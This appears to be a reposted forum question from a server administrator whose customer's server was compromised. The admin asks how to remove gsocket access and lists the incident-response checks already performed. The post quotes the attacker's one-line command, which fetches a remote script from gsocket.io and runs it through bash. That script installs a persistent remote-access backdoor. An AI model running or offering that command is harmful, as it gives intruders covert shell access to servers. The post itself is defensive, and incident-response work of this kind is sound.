• caglararli@hotmail.com
  • 05386281520

Removing Gsocket.io connection from server

Çağlar Arlı      -    5 Views

Removing Gsocket.io connection from server

My customer server has been compromised. They running this script by the PHP script

bash -c "$(curl -fsSL https://gsocket.io/x)"

and I have several folder in /tmp file as below

-rw-------  1 *** *** 153310 Sep 30 12:07 phpb0wrlJ
-rw-------  1 *** *** 65536 Sep 29 13:50 phpc29KRO
-rw-------  1 *** *** 40960 Sep 30 12:43 phpdrvPac
-rw-------  1 *** *** 49152 Sep 29 14:30 phpOWdcZw

That really suspicious. I have:

  1. Check for new users or unauthorized changes in /etc/passwd and /etc/shadow files.
  2. Analyze network connections with commands like netstat -tulnp or ss -tuln, looking for unfamiliar listening services or connections.
  3. Examine running processes with ps aux to identify suspicious scripts or binaries.
  4. Review log files in /var/log, specifically auth.log, syslog, or messages, for any unauthorized logins, sudo usage, or other unusual activity.
  5. Find unfamiliar files in critical directories, such as /tmp, /var/tmp, /home, /etc, or any binary directories like /usr/local/bin.

My question, how to remove the gsocket access from my server?

Thank you in advance.